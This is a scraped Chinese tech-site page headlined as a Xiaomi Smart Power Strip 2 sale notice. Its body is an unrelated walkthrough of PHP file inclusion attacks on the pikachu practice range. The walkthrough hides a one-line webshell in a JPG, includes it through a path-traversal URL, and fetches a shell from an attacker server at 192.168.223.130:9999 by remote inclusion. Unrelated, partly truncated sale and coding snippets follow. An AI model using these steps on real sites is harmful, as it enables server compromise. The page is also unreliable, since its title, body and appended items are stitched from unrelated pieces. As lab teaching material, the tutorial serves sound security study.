2. 程式人生 > 資訊 >小米智慧插線板 2(5 位插孔版)今日開售,零售價 69 元

小米智慧插線板 2(5 位插孔版)今日開售,零售價 69 元

阿新 發佈:2021-12-01
檔案包含 概念 把可以重複使用的函式寫入單個檔案中,在使用該函式時,直接呼叫此檔案,無需再次編寫函式,這呼叫檔案的過程稱為包含 漏洞原理 大多數情況下,檔案包含函式中包含的程式碼檔案是固定的,因此也不會出現安全問題。 但是,有些時候,檔案包含的程式碼檔案被寫成了一個變數,且這個變數可以由前端使用者傳進來,這種情況下,如果沒有做足夠的安全考慮,則可能會引發檔案包含漏洞。 攻擊著會指定一個“意想不到”的檔案讓包含函式去執行,從而造成惡意操作 防禦 在web應用系統的功能設計上儘量不要讓前端使用者直接傳變數給包含函式,如果非要這麼做,也一定要做嚴格的白名單策略進行過濾 漏洞型別 一、本地檔案包含漏洞
 僅能夠對伺服器本地的檔案進行包含,由於伺服器上的檔案並不是攻擊者所能夠控制的,因此該情況下,攻擊著更多的會包含一些 固定的系統配置檔案,從而讀取系統敏感資訊。很多時候本地檔案包含漏洞會結合一些特殊的檔案上傳漏洞,從而形成更大的威力。 以pikachu靶場為例,通過白盒的方式進行展示 1.首先將一句話木馬和一個普通的檔案結合起來(一句話木馬通過txt或者php儲存都不影響) copy /a 1.jpg + /b test.php = muma.jpg 2.上傳到Unsafe Fileupload的getimagesize中,獲取儲存路徑為uploads/24931561b9d4c42c4f0082985216.jpg
 PS:如果出現報錯,發現是時間的問題,可以到靶場配置檔案getimagesize.php下修改儲存路徑為$save_path='uploads/' 3.找到本地下包含木馬的jpg檔案位置為vul/unsafeupload/uploads/24931561b9d4c42c4f0082985216.jpg,然後到File Inclusion下的local,隨便點選一個圖片,獲取儲存地址為vul/fileinclude/fi_local.php?filename=file1.php&submit=提交查詢 4.通過本地找到該圖片的位置為vul/fileinclude/include 下,觀察3中的url位置,修改filename到含有木馬的檔案下,完成執行
 vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/24931561b9d4c42c4f0082985216.jpg&submit=提交查詢 PS:該url可以通過蟻劍建立連線 二、遠端檔案包含漏洞 能夠通過url地址對遠端的檔案進行包含,這意味著攻擊者可以傳入任意的程式碼 準備:1.開啟配置檔案,修改php.ini檔案的allow_url_include = Off 改成 On 2.開啟一個伺服器:python3 -m http.server 9999 並將一句話木馬上傳到伺服器下 1.首先在伺服器上編寫一句話木馬,儲存檔案為1.txt 2.找到伺服器上木馬的位置為http://192.168.223.130:9999/1.txt 3.在pikachu的File Inclusion的remote中,點開圖片後,修改url的filename為木馬位置,完成執行 vul/fileinclude/fi_remote.php?filename=http://192.168.223.130:9999/1.txt&submit=submit=提交查詢

相關推薦

小米智慧線板 25 插孔今日零售價 69

12 月 1 日訊息,小米智慧插線板 2(5 位插孔版)今日上架開售,零售價 69 小米智慧插線板 2(5 位插孔版)尺寸為 264 x 42 x 27 mm採用物理開關並支援藍芽 Mesh 閘道器接入米家 App支援過載提醒、遠端

小米盲盒系列之 “歡歡喜喜過大年”每個 69

22 日訊息小米盲盒系列之「歡歡喜喜過大年」今日小米商城 / 小米有品 / 天貓每個售價 69

Mac 安裝 MySQL5.7.x

Mac 安裝 MySQL5.7.x 目錄Mac 安裝 MySQL5.7.x一、資料庫分類RDBMS關係資料庫管理系統NoSQLNewSQL二、官網下載三、環境變數設定四、啟動MySQL與修改密碼啟動修改密碼五、可用命令

小米米家輕羽無線吸塵器今日配備 LCD 智慧

9 月 9 日訊息小米近日推出了米家輕羽無線吸塵器今日全平臺同步售價 1299

Redmi K30S 至尊明日再小米盧偉冰:抱歉春節前還是趕了一些貨出來

2 月 4 日訊息 小米商城宣佈Redmi K30S 至尊紀念版手機將於 25 日 上午 10 點再次。這款手機自發布起便貨源緊張需要搶購才可以買到。

小米淨水器 1200G 明日 0 點首發 2999

7 月 25 日訊息小米淨水器 1200G 於本週正式釋出首發價 2999 將於明日 0 點正式

華為 P50 Pro 今日現已獲推鴻蒙 HarmonyOS 2.0.0.175 版本

8 月 12 日訊息華為在 7 月 29 日正式面向全球釋出了華為 P50/Pro 手機這是華為首款出廠預裝鴻蒙系統的手機搭載了海思麒麟 9000 晶片擁有國產螢幕支援 4G 全網通。

微軟 Xbox《極限競速:地平線 5》限量手柄定價 539

11 月 9 日訊息微軟此前推出了兩款遊戲限定 Xbox 手柄分別為《極限競速:地平線 5》限定 Xbox Series X/S 手柄以及《光環:無限》限定Xbox 精英 2 代手柄。《極限競速:地平線 5》限定 Xbox Series X/S 手柄今

《上古卷軸 5:天際 週年紀念版》Steam 售價 149

11 月 11 日訊息今天是《上古卷軸 5:天際》問世 10 週年的紀念日《上古卷軸 5:天際 週年紀念版》現已上架 Steam 開售,售價 149 。已購買本作特別的玩家可支付 79 升級至《上古卷軸 5:天際 週年紀念版

3 秒速吸:金號純棉大毛巾 2 條 14.9 5 摺好價

【金號官方旗艦店】 金號 A 類純棉毛巾 100g*2 條 / 63g*3 條售價 29.9 元,今日可領 15 元大促券實付 14.9 近期新低:天貓金號 純棉大毛巾 2 條 100g/條券後 14.9 領 15 券0 甲醛 + 3 秒速吸A 類嬰幼兒標

從小吃到大:桃李提漿月餅 2.5 /塊速囤5 折探底

【桃李食品旗艦店】 桃李提漿月餅 100g*8 枚散裝售價 39.8 元,今日下單立減 5 + 可領 15 衝量券實付 19.8 元,大部分地區順豐包郵:天貓桃李 提漿月餅 800g 優選新鮮食材製作券後 19.8 領 15 券有 8

香甜不膩:桃李提漿月餅 2.5 /塊速囤5 折探底

【桃李食品旗艦店】桃李提漿月餅 100g*8 枚散裝售價 39.8 元,今日下單立減 10 + 可領 10 衝量券實付 19.8 元,大部分地區順豐包郵:天貓桃李 提漿月餅 800g 優選新鮮食材製作券後 19.8 領 10 券此單

小米 Watch Color 2 智慧手錶釋出:支援雙頻 GPS、全天候血氧檢測售價 999

9 月 27 日訊息 在今天下午的小米 Civi 智慧手機發佈會上,小米還帶來了一款智慧手錶新品 —— 小米 Watch Color 2,支援雙頻 GPS、全天候血氧檢測、睡眠和心率監測。小米 Watch Color 2 採用 1.43 英寸 AMOLED 圓形

首發價 2999 小米平板 5 Pro 8GB+256GB 大容量今日:驍龍 870+2.5K 120Hz 屏

12 月 31 日訊息,小米平板 5 Pro 全新 8GB+256GB 大容量版本於 12 月 28 日釋出搭載驍龍 870 處理器售價 3099 元,首發到手價 2999 元,將於今日 20:00 正式開售。此前,小米平板 5 Pro 僅5G 擁有 8GB+256GB

爬蟲10-2多執行緒爬蟲

繼承自threading.Thread類 為了讓執行緒程式碼更好的封裝。可以使用threading模組下的Thread類繼承自這個類然後實現run方法執行緒就會自動執行run方法中的程式碼。示例程式碼如下:

藍橋杯2013年省賽c/c++A組題2排它平方數

題目標題: 排它平方數 小明正看著 203879 這個數字發呆。 原來203879 * 203879 = 41566646641這有什麼神奇呢?仔細觀察203879 是個6位數並且它的每個數位上的數字都是不同的並且它平方後的所有數位上都不出

Educational Codeforces Round 93 (Rated for Div. 2)A B C D

Practice link:https://codeforces.ml/contest/1398 A. Bad Triangle 程式碼: 1 //#include<bits/stdc++.h>

以JSON形式實現前端互動2BOSS直聘動態

先用vue重構頁面 先看index.html完整程式碼 <!DOCTYPE html> <html> <head> <meta charset=\"utf-8\">

Codeforces Round #670 (Div. 2)A B C D

題目列表 A. Subset Mex B. Maximum Product C. Link Cut Centroids D. Three Sequences Practice link:https://codeforces.ml/contest/1406

小米智慧遙控車開啟預約:復刻吉姆尼越野悍將199

10 月 3 日訊息 6 月末小米釋出了一款智慧遙控汽車並開啟了眾籌活動。現在這款智慧遙控車已經在小米商城和小米有品開啟預約售價為 199